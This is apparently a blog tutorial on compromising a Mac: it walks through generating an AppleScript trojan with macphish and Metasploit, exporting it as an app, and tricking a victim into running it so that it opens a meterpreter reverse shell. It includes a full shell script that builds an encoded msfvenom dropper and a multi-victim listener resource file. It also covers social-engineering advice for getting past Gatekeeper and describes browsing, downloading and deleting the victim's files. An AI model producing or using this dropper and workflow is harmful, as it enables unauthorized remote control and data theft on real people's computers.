Note: If you do not have Kali Linux, you can buy a pre-made, ready-to-boot USB with Kali Linux on it from here (Amazon). Any sales will support our content creators.
We are a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for us to earn fees by linking to Amazon.com and affiliated sites.
In this tutorial, we will be using Kali Linux to gain remote access to a Mac, by tricking the user into running an AppleScript application that connects back to a Metasploit listener.
A quick preview at what we’ll be doing:
- Download macphish – a program that will allow us to create custom applescripts that open up a backdoor on the victim’s computer.
- Choose a payload from metasploit – for macphish to work, we need to give it a payload to run. We need to use a python-based payload, but metasploit has a lot of those.
- Generate a payload in macphish – once we give it the parameters, macphish will do all the hard work and create an applescript.
- Create an application that will run the script – using mac’s script editor, we can paste our applescript into the script editor and create a file that will run our script.
- Start a meterpreter session – the trojan is a reverse payload: when it runs it connects back to us, so nothing happens unless we already have a listener waiting. With metasploit's multi/handler we set up that listener, and the connection it receives becomes our meterpreter session.
- Send the file to the victim and wait for them to click on it – with a bit of social engineering, we can trick the victim into running our trojan file.
Step 1: Download macphish
Macphish is a tool that automatically generates applescripts that will allow you to gain remote access to a computer. By giving macphish an IP address, a listening port, a payload, and a trojan type, we can generate an applescript that will create a backdoor when it runs. We need to start by downloading macphish from GitHub. Type
git clone https://github.com/cldrn/macphish.git
to download the macphish tool.
Now we want to enter the macphish directory and see the files. Type in
cd macphish
ls
to see the files that are listed. To start up the tool and see the options, we can type in
./macphish.py -h
If we scroll down to the bottom, we can see the options listed. Note the distinction between the two kinds of choice macphish asks for: the attack type (the -a option) decides what the applescript does, while the payload (the -p option) is the Metasploit payload it embeds. Macphish can spawn 4 different attack types: beacon, creds, meterpreter, and meterpreter-grant. We will be using meterpreter in this tutorial.
Step 2: Choose a payload to use from metasploit
Before we generate the applescript, we need to choose a meterpreter payload. Open a new terminal window and list the available payloads by typing in
msfvenom -l payloads
That list is long, so it helps to filter it down to the ones we can actually use:
msfvenom -l payloads | grep '^ *python/'
Due to the nature of macphish (the applescript it generates simply hands a Python one-liner to the shell), we are limited to using only python-based payloads, but that is by no means a bad thing.
For this article, we will be using python/meterpreter/reverse_tcp, but you can choose any payload that you want. Just make sure that it has "python" at the beginning of its name. One caveat worth checking before you go further: the payload only works if the target Mac has a Python interpreter on its PATH. Older versions of macOS shipped Python 2 at /usr/bin/python, but macOS 12.3 and later no longer include it, so on a current Mac the script will fail unless Python has been installed separately (for example with Xcode's command line tools or Homebrew).
Step 3: Generate the applescript in macphish
Now that we’ve chosen our payload, we can move back to our macphish window and type in
./macphish.py -lh [your IP address] -lp 4444 -p python/meterpreter/reverse_tcp -a meterpreter
Here -lh is the IP address the victim's Mac will connect back to, so it has to be an address that is reachable from the target (on a lab network, the Kali machine's own address). This will allow macphish to generate a custom applescript that can run silently on a mac.
Now that we have our applescript, we need a mac computer to do the rest of the hack. Save the generated script to a text file using nano or vim, then copy that file to the Mac (email it to yourself, or use scp). We are going to need to use a mac for the next part of this hack.
Step 4: Create an applescript and export it as an application
On your mac, open up Script Editor (it lives in the Applications/Utilities folder).
Paste the script into the editor, then choose File > Export and set the file format to Application.
This will create an application bundle (the mac equivalent of an exe file) wherever you chose to save it, for example on the desktop. If we run it now, nothing visible happens: the script tries to connect back to the address and port we gave macphish, finds nobody listening, and quietly gives up. We're going to fix that by going back into Kali Linux and starting a meterpreter listener.
Step 5: Start the meterpreter session
Back in Kali Linux, start up metasploit by opening up a new window and typing in
msfconsole
After this, we will select the generic handler, set the parameters to match what we gave macphish (the same payload, IP address and port), and start the listener by typing
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost [your IP address]
set lport 4444
run
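The two things macphish and msfconsole do for us in Steps 3 and 5 can also be done by hand, and seeing the mechanics makes it clear what the "trojan" actually is: an AppleScript whose only statement is a `do shell script` that launches the msfvenom-generated Python stager. The script below is an added example, not macphish's own code or the original post's; it assumes msfvenom is on the PATH, and the exact shape of the wrapper (base64-encoding the stager and running it with `python -c`) is an assumption about how such a dropper is commonly built rather than a description of what macphish emits.

```shell
#!/bin/sh
# Added example (not macphish code). Builds a one-statement AppleScript dropper
# and a matching msfconsole resource file from LHOST, LPORT and a python payload.
# Assumption: msfvenom is on the PATH when main() is run.

# Escape a string so it can sit inside an AppleScript double-quoted literal.
# Backslashes first, then double quotes, otherwise the second pass would
# double the backslashes the first pass just produced.
applescript_escape() {
  printf '%s' "$1" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g'
}

# Wrap a shell one-liner in `do shell script`. The redirect and trailing `&`
# matter: `do shell script` blocks until the child's stdout closes, so without
# them the applet would hang open for as long as the reverse shell lives.
build_applescript() {
  cmd=$(applescript_escape "$1")
  printf 'do shell script "%s > /dev/null 2>&1 &"\n' "$cmd"
}

# Equivalent of the handler setup typed into msfconsole in Step 5, as a
# resource file (run it with: msfconsole -r handler.rc).
# ExitOnSession false + exploit -j -z keeps the listener up for more than one
# victim and returns the prompt instead of dropping into the first session.
build_handler_rc() {
  lhost=$1; lport=$2; payload=$3
  printf 'use exploit/multi/handler\n'
  printf 'set payload %s\n' "$payload"
  printf 'set LHOST %s\n' "$lhost"
  printf 'set LPORT %s\n' "$lport"
  printf 'set ExitOnSession false\n'
  printf 'exploit -j -z\n'
}

# Generate the stager with msfvenom (-f raw gives python source for python/*
# payloads), base64 it so it survives quoting, and emit both files.
main() {
  lhost=$1; lport=$2; payload=${3:-python/meterpreter/reverse_tcp}
  stager=$(msfvenom -p "$payload" LHOST="$lhost" LPORT="$lport" -f raw 2>/dev/null | base64 | tr -d '\n')
  [ -n "$stager" ] || { echo "msfvenom produced no output" >&2; return 1; }
  # Decoding with python itself avoids the base64 -d / -D difference between
  # GNU and macOS; exec() works on both Python 2 and 3.
  build_applescript "python -c \"import base64;exec(base64.b64decode('$stager'))\"" > dropper.applescript
  build_handler_rc "$lhost" "$lport" "$payload" > handler.rc
  echo "wrote dropper.applescript and handler.rc"
}

# Usage: sh build_dropper.sh <LHOST> <LPORT> [payload]
if [ "$#" -ge 2 ]; then
  main "$@"
fi
```

On the Mac side, `dropper.applescript` can be turned into the same application bundle Script Editor exports with `osacompile -o Dropper.app dropper.applescript`, which is handy when you want to script Step 4 rather than click through it. Keep in mind that either way the result is an unsigned app; if it reaches the target as a download, the quarantine attribute means Gatekeeper will refuse to open it on a double-click, which is part of what the social engineering in Step 6 has to get past.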
Step 6: Wait for the victim to click on the file
Once the victim runs the application, it connects back to our listener and a meterpreter session will be opened. Note that if the app arrived on the Mac as a download, it carries the quarantine attribute and Gatekeeper will refuse to launch an unsigned app from a plain double-click; the victim has to be talked into right-clicking and choosing Open, so the social engineering matters as much as the payload.
We can type in
help
to see the list of commands available to us.
From here, we can browse, download, and delete the victim's files and execute commands on the machine. When we're done, we can type
exit
to exit the session.
- We used macphish while on Kali Linux to generate an applescript that will open up a malicious backdoor. (If you don't have access to Kali Linux, you can buy it through Amazon here.)
- We transported the applescript code to a mac, allowing us to create an application file that will run on the victim's computer.
- We started a meterpreter listener on Kali Linux that the mac connects back to once the trojan is run. This gives us access to the computer and its files, with the privileges of the user who ran the application.